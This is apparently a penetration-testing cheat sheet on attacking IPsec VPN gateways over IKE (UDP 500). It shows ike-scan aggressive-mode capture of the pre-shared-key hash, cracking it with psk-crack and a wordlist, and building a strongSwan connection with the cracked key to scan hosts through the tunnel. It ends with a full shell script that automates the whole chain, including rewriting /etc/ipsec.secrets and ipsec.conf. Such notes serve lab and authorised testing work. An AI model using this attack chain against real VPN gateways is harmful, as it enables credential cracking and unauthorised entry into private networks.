500 (IPSEC IKE)
ike-scan IP -A
aggressive mode (-A): the gateway answers with an authentication hash derived from the PSK (a crackable hash, not the PSK itself). Save it with -P/--pskcrack and run psk-crack (dictionary or brute force) against it.
ike-scan IP -M
multi-line output (-M): one SA attribute per line, much easier to read.
SA (security association) data: copy it. The transform it lists (encryption, hash, auth method, DH group, lifetime) is what your own client config has to offer to be accepted.
If SNMP (161/udp) is open, snmpwalk it as well: device config exposed over SNMP can include VPN PSK-related details (hash type, DH group, group/ID name) that you combine with the SA data.
Life duration: ike-scan prints it as hex bytes (e.g. LifeDuration(4)=0x00007080). Convert to decimal for seconds (28800), then divide by 3600 for hours (8).
apt install strongswan
Once installed, edit /etc/ipsec.secrets and add the PSK entry for the gateway (selectors, then : PSK "secret").
Edit /etc/ipsec.conf and add a conn block under "Sample VPN connections", with the keyexchange, aggressive, ike and esp settings matching the SA data you copied:
ipsec start --nofork (runs the daemon in the foreground so the IKE negotiation log stays visible)
leftprotoport=tcp and rightprotoport=tcp
set these when the gateway's TCP ports are hidden from us outside the tunnel: they restrict the traffic selectors to TCP, so TCP traffic to the gateway is carried through the VPN.
For troubleshooting IKE, see https://docs.netgate.com/pfsense/en/latest/troubleshooting/ipsec-traffic.html
If there are no errors, run the nmap scan with the -sT (connect) option!
(You cannot use a SYN scan, nmap's default, while the client is using the VPN: it injects raw packets below the IP stack, so they never match the IPsec policy and never enter the tunnel. A connect scan uses normal kernel sockets and completes the full TCP handshake, so that traffic is actually sent over the VPN.)
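The whole procedure above as one script. This is an added example, not part of the original note: the target address, the group/ID name, the wordlist path, the cracked PSK and the aes128-sha1-modp1024 proposal are assumptions and must be replaced with what ike-scan and SNMP actually reported. The ike-scan, psk-crack, strongSwan and nmap options used are the real ones.

```shell
#!/bin/sh
# Added example (not from the original note): IKE enumeration, PSK hash capture and
# cracking, LifeDuration conversion, and a strongSwan connection matching the SA data.
# ASSUMED values (replace them): TARGET, VPN_ID, WORDLIST, PSK, IKE/ESP proposals.
TARGET="${TARGET:-10.10.10.10}"                       # assumption: VPN gateway
VPN_ID="${VPN_ID:-vpn}"                               # assumption: group/ID name (often found via SNMP)
WORDLIST="${WORDLIST:-/usr/share/wordlists/rockyou.txt}"
PSK="${PSK:-cracked_psk_here}"                        # assumption: the cracked PSK
IKE_PROPOSAL="${IKE_PROPOSAL:-aes128-sha1-modp1024}"  # assumption: match the SA's enc/hash/group
ESP_PROPOSAL="${ESP_PROPOSAL:-aes128-sha1}"

# Step 1: enumerate the SA, then capture the PSK hash in aggressive mode and crack it.
# -A aggressive mode, -M multi-line output, --id group name, --pskcrack saves the hash.
ike_enum() {
    ike-scan -M "$TARGET"
    ike-scan -A -M --id="$VPN_ID" --pskcrack=ike.psk "$TARGET"
    psk-crack -d "$WORDLIST" ike.psk
}

# Step 2: LifeDuration is printed as hex bytes, e.g. LifeDuration(4)=0x00007080.
lifetime_seconds() { echo $(( $1 )); }                          # shell arithmetic parses the 0x prefix
lifetime_hours()   { echo $(( $(lifetime_seconds "$1") / 3600 )); }

# Step 3: /etc/ipsec.secrets entry: <local> <remote> : PSK "<secret>" (%any = any local address).
ipsec_secrets() {
    printf '%%any %s : PSK "%s"\n' "$TARGET" "$PSK"
}

# Step 4: /etc/ipsec.conf conn block. keyexchange=ikev1 and aggressive=yes match what
# ike-scan negotiated; leftprotoport/rightprotoport=tcp restrict the selectors to TCP.
# type=transport is an assumption (host-to-host); use tunnel if the gateway expects it.
ipsec_conf() {
    cat <<EOF
config setup
    charondebug="ike 2, cfg 2"

conn pentest
    keyexchange=ikev1
    aggressive=yes
    authby=secret
    ike=${IKE_PROPOSAL}
    esp=${ESP_PROPOSAL}
    type=transport
    left=%defaultroute
    leftid=@${VPN_ID}
    right=${TARGET}
    leftprotoport=tcp
    rightprotoport=tcp
    auto=add
EOF
}

# Step 5: write the files, start charon in the foreground, bring the conn up, connect-scan.
ipsec_up_and_scan() {
    ipsec_secrets > /etc/ipsec.secrets
    ipsec_conf    > /etc/ipsec.conf
    ipsec start --nofork &                # foreground daemon: IKE log stays visible
    sleep 3
    ipsec up pentest
    nmap -sT -p- "$TARGET"                # -sT: full handshake via the kernel, so it goes through the tunnel
}

# Only the offline helpers run by default; "enum" or "connect" run the network steps (root).
case "${1-}" in
    enum)    ike_enum ;;
    connect) ipsec_up_and_scan ;;
    *)       echo "LifeDuration 0x00007080 = $(lifetime_seconds 0x00007080) s = $(lifetime_hours 0x00007080) h" ;;
esac
```

Run it with no argument to check the lifetime conversion and review the generated config (`ipsec_conf`), with `enum` against the gateway, and with `connect` once the PSK is cracked.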